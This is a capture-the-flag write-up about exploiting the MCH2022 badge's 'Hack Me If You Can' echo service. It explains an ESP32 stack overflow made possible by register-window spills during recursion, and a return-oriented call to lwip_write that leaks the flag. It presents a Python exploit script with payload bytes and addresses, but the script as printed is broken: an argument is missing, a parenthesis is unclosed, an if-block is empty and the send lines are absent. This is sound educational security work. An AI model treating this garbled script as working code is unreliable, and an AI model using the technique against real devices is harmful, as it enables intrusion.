The full exploit is available on Github.

The badge for the MCH2022 hacker camp comes with a CTF challenge, which, thanks to the ESP32’s Xtensa architecture, appears to be somewhat protected against classic stack overflow attacks. However, thanks to recursion in the main loop, a buffer overflow is all that is needed to solve it. This post will walk through the vulnerability and explain how it can be exploited to steal the flag.

0. Setup

“Hack Me If You Can” comes preinstalled on the badge. For the duration of the competition, a copy of hack_me_if_you_can.elf could also be downloaded from the CTF website. Although the CTF has now ended, you can still exploit this vulnerability on your own badge.

On badges: you technically don’t need one to solve this challenge. However, it would be tough to develop an exploit without it. A badge also gives you access to the ESP32’s debug log, which can be read via the USB serial interface:

screen /dev/[tty_usb_device_name] 115200

Note: Only organisers’ badges contained the real flag. At the camp, participants were instructed to develop a proof of concept against their own badge and find an organiser once they had a working exploit.

1. Finding the vulnerability

1.1 A mysterious crash

The badge’s challenge app consists of a simple echo server hosted on port 1337. When a client attempts to connect, the badge will prompt its owner for approval, after which the service will repeat anything sent by the client:

$ nc badge.ip 1337
Connection accepted!
> hello
< hello
> echo
< echo

Being CTF players, our first instinct should be to stuff a very long input buffer into the prompt. When we do, we find that the service crashes as soon as inputs exceed 48 bytes. Let’s circle back to why this is strange behaviour for an ESP32-style chip later.

At this point we can crash the app, but we can’t do much else. We need to analyse the programme further to find out where to go next. Fortunately, there is an open source Xtensa module for Ghidra that will let us disassemble the compiled binary.

1.2 Digging for the flag

First things first: let’s find our flag. The app’s main function is called app_main(). This function calls into start_service(), which does the heavy lifting for our echo service. Aside from setting up the WiFi and calling into echo_server(), it also attempts to read a value from the ESP32’s non-volatile storage (a key-value store) with the key hackmeifyoucan. This value, if found, gets copied to an uninitialised array named flag.

Further down, we observe that the string flag{not_a_real_flag} gets copied to the same location if the key-value store query is unsuccesful. Putting two and two together, we can safely assume the flag will be at address 0x3ffb5358 during runtime.

1.3 A not-so-mysterious crash?

We need to understand why the programme crashes when the input buffer exceeds 48 bytes. This is unusual because Xtensa processors like the ESP32 do not, as a rule, store return addresses on the stack. Rather, they are stored in a dedicated register, a0. On chips like the ESP32, there are 64 registers, of which 16 are visible to the CPU at any given time. When a function is called, the ‘window’ of visible registers shifts forward, giving the callee a fresh set of registers to work with. (Note here that the callee’s register a0 is not the same as the caller’s register a0.) When the callee returns, the window shifts back so that the caller can pick up where it left off. The benefit of this arrangement is not having to offload memory to the stack, which results in increased performance. It also means we cannot overwrite the return address with a stack overflow.

However, the debug log reveals that we definitely are overwriting a return address when we send buffers larger than 48 bytes. How can this be?

Let’s take another look at Ghidra. At the time our corrupted return address gets loaded into the program counter we are returning from the recursive function do_echo_recursive(). This function calls itself nine times before calling into the actual echo function, do_echo(). We said earlier that the register window shifts every time a function is called to provide clean registers to the callee. But the ESP32 only contains 64 registers, and each call to do_echo_recursive() moves the window to the right by eight. Here we see a problem: we will run out of registers.

What happens in these cases is that the ESP32 will loop back around and overwrite registers that were allocated to earlier function calls, but not before saving their contents onto the stack. Of course, as soon as values get pushed to the stack, we can use our stack overflow to manipulate them. This appears to be what happened when we managed to overwrite a return address with our long input buffer. Thanks to the recursion employed by do_echo_recursive(), we can hijack execution flow as if it were a regular x86 or ARM processor.

1.4 Finding offsets and fixing registers

Before we can exploit this vulnerability, we need to find out what else we control and how we can use this to our advantage. The easiest way to do this is to send an input pattern in which every byte is unique.

At first glance, it appears we can only control the return address (see the program counter PC). However, we can also try overwriting more registers, particularly to see if we can play with the stack pointer in register a1. Because the return address and the stack pointer are stored next to each other in memory, we simply need to write four bytes beyond the return address to control the stack pointer. We start at the original value for our frame (0x3ffbf1d0) and play around with it until we find that address 0x3ffbb1b0 will result in values from our input buffer being stored in registers a10 and a11.

This is extremely helpful because the Xtensa calling convention reserves registers a10-a13 as the first four arguments to any function call that is made with a call8 instruction. Controlling some of these registers will help us make our own function calls.

Finally, we have a slightly annoying problem to solve. In the examples above, we had to terminate our TCP connection in order to trigger the crash and obtain the register dump. This is because do_echo() only returns under one of two conditions: the connection gets closed, or a newline character (0x0a) is received. Closing the connection is bad for us, because we won’t be able to send data back to our machine. However, sending an extra 0x0a character ends up overwriting the first argument to do_echo_recursive(), which happens to be the socket descriptor for our TCP connection. Let’s make a mental note here that this appears to always be set to 0x37.

2. Developing the exploit

At this point we have all we need to start developing an exploit. We can control execution flow, pass arguments to function calls, and keep the connection alive to send data back to our machine.

2.1 Finding a ROP gadget

First some advice: do your homework. If I had done mine, I would have known that the Xtensa stack is not executable. Hopefully this will save you from trying to write shellcode for an architecture that essentially only supports relative addressing, which, I learned, is not fun.

Just because we cannot run our own shellcode does not mean we can’t tell the programme what to do, however. We can use return-oriented programming to make use of any instructions already present, including those related to sending data over TCP.

One function stands out in particular: ssize_t lwip_write(int socket, void* data, size_t size). This function invokes lwip_send() to send data over TCP and takes three arguments, of which we can set the first two via a10 and a11. Further, the register dumps show that a12 – the third argument – already contains a large value at the time our return address gets loaded. If we set our return address to lwip_write(), a10 to our socket descriptor (0x37), and a11 to the flag address we found earlier, we should be able to send the flag back to our client. Helpfully, lwip_write() also sets a13 (the TCP flags argument to lwip_send()) to 0x0, so we don’t have to figure out how to do it ourselves.

2.2 Writing the exploit

If we bring all this together, we get a fairly straightforward Python exploit:

import socket
import argparse

def main():
    parser = argparse.ArgumentParser(
            description="Exploit for the 'Hack Me If You "
                        "Can' challenge for the MCH2022 CTF."
    parser.add_argument('target', type=str, help='target IP / hostname')
    parser.add_argument('port', type=int, help='target port')
    args = parser.parse_args()

    # Exploit constants
    A10 = b"\x37\x00\x00\x00" # socket descriptor (first argument)
    A11 = b"\x58\x53\xfb\x3f" # flag address (second argument)
    PC  = b"\xb8\x76\x0d\x40" # call8 lwip_write(a10, a11, a12)
    A1  = b"\xb0\xf1\xfb\x3f" # stack pointer (req'd to return from do_echo())

    exploit(, args.port, A10, A11, PC, A1)

def exploit(target, port, a10, a11, pc, a1):
    buffer = b"\x65" * 40 + a10 + a11 + pc + a1 + b"\n"

    print(f"Connecting to {target}:{port}...")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target, port))

    print(f"Waiting for user to accept connection...")
    r = s.recv(128)
    status = r.decode()

    if "denied" in status:

    print(f"Sending malicious buffer...")

    print(f"Buffer sent, awaiting reply...")

    # Discard output of do_echo() 

    r = s.recv(39)

    print(f"Flag: {r.decode()}")

if __name__ == "__main__":

When we run the exploit, we can see that we did it! We can successfully retrieve the placeholder flag from our badge. A CTF organiser has kindly confirmed the exploit also works against badges containing the real flag.


3. Conclusion

This was an extremely fun and rewarding badge challenge. What’s interesting is that none of techniques involved are particularly esoteric. Rather, the challenge lies in getting to grips with a new processor architecture and working without a debugger. Above all, it teaches you that appearances can be deceiving, and that it pays dig deeper when things don’t add up.

Sadly I didn’t win any points for this challenge – I solved it two days after getting home. The two teams who did manage to solve it while at MCH2022 were Bratzenamt and ChaosWest. Well done and hats off to both of them.

Thanks to the organisers of the MCH2022 CTF for a excellent challenge and a great CTF!